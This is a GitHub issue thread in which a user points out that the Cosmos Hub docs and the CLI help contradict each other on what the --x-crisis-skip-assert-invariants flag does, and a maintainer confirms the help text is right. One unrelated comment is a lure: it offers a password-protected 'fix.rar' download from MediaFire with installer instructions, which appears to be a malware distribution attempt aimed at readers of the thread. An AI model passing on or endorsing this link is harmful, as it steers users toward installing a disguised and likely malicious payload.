### ISSUE TITLE
[Docs]: Confusing phrasing for `--x-crisis-skip-assert-invariants`

### ISSUE THREAD

**Issue by rootulp** [cosmos/gaia#3298]
### Summary

On [this page](https://hub.cosmos.network/v19.1.0/hub-tutorials/join-mainnet#verify-mainnet):

> To run a node with these checks start your node with the --x-crisis-skip-assert-invariants flag:

However, the help docs for the CLI state:

```
      --x-crisis-skip-assert-invariants                 Skip x/crisis invariants check on startup
```

so there appears to be a contradiction here. The docs website claim that to run the checks, provide the flag. The CLI docs claim that to skip the checks, provide the flag. Which is it?

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MSalopek** [comment]
Thanks for opening the issue and flagging!

The help string is correct, we'll fix the docs with your suggestions.
